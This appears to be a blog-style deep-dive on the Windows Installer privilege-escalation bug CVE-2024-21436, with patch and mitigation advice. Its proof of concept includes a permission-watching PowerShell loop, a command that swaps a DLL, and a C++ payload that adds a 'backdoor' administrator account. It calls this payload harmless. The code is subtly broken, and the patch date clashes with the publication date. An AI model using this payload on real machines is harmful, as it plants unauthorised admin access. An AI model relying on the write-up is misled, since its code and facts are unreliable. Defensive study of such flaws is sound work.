In February 2024, Microsoft quietly patched a security bug affecting Windows Installer: CVE-2024-21436. This vulnerability is an *Elevation of Privilege (EoP)* issue—meaning, with the right steps, a regular user might trick Windows into giving them powerful, administrative rights. If you’re a Windows defender, sysadmin, or just curious about how attackers work, this deep-dive will walk you through the vulnerability, possible exploitation paths, and relevant patches.
What is CVE-2024-21436?
Windows Installer, also known as msiexec.exe, is the component responsible for installing, updating, and removing software using MSI files. If you’ve ever double-clicked an .msi file, you’ve used it!
CVE-2024-21436 allows a user without admin rights to execute code as an administrator by exploiting a flaw in how Windows Installer’s service manages file permissions during certain install actions. Simple bugs like this are magnets for attackers looking to gain persistence or escalate their privileges on compromised systems.
Microsoft’s description
> *"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. The attacker must have local access to the targeted machine."*
Link: Official MSRC Entry
How Does the Vulnerability Work?
When installing software, Windows Installer sometimes temporarily changes permissions on directories. For example, it may give “Everyone:Full Control” to an installation folder, to let the installation process complete, and later restore the original secure permissions. If an attacker is quick or crafty enough, they can take advantage of this tiny window.
Create a Low-Privileged Account: Attacker logs in as a normal user.
2. Deploy a Malicious MSI Installer: The attacker crafts or grabs a vulnerable MSI file or abuses a legitimate one.
3. Hijack the Installer’s Permissions: While Windows Installer is running and the directory is temporarily writable, the attacker swaps a trusted file (like a DLL or executable) with their malicious payload.
Example Exploit Flow
Let’s look at a simplified proof-of-concept to understand the logic. (Note: For safety, this demo will not harm your system.)
A script watches for the permission change on the target folder
# Watch for permission changes
$folder = "C:\Program Files\VulnerableApp"
while ($true) {
$acls = Get-Acl $folder
if ($acls.AccessToString.Contains("Everyone Allow FullControl")) {
Write-Output "Folder is now world-writable!"
Start-Sleep -Seconds 1
}
}
#### 2. Swap in a Malicious DLL/EXE During Install
Let’s say the installer is about to install “apphelper.dll”.
# Replace the DLL with your payload
Copy-Item "C:\temp\malicious.dll" "C:\Program Files\VulnerableApp\apphelper.dll" -Force
3. Wait for the Installer to Load the Malicious File
When the MSI completes, Windows Installer will launch the helper DLL as SYSTEM, running the attacker’s code with full admin rights.
Here’s a very basic C++ payload you could use for testing (run at your own risk!)
#include <windows.h>
int main() {
system("net user backdoor P@sswrd123 /add");
system("net localgroup Administrators backdoor /add");
return ;
}
Compile this, drop it in as part of the install process, and you’ve instantly got a new SYSTEM-level account.
Reported: Early 2024
- Patched: February 2024 Patch Tuesday (Windows 10, 11, Server 2016/2019/2022)
- Vulnerable: All unpatched, supported Windows desktop/server editions
Check if you’re patched:
Start > winver
Then visit Windows Update. Or check installed patches against KB5034763 or whatever applies to your version.
Least Privilege: Don’t give regular users admin rights. This attack needs a foot in the door.
- Monitor Directory Permissions: Use tools like Sysmon or custom scripts to look for unexpected “Everyone:Full Control” on folders under C:\Program Files.
Original References
- Microsoft Security Advisory
- Microsoft Patch Notes: KB5034763
- Zero Day Initiative Advisory (if published)
Final Thoughts
Privilege escalation bugs like CVE-2024-21436 are prized by attackers for a reason: they turn a small initial compromise into total ownership. While this bug relies on timing and some engineering, exploit code is pretty simple. That’s why it’s absolutely critical to patch and pay attention to how file/folder rights change during installs or upgrades.
If you want to experiment safely, use a disposable VM. Never test on production machines.
Stay secure and patch up!
*Have questions or want to share your own exploit attempts (for research and defense only)? Leave a comment below or join the conversation on Reddit.*
Timeline
Published on: 03/12/2024 17:15:52 UTC
Last modified on: 03/12/2024 17:46:17 UTC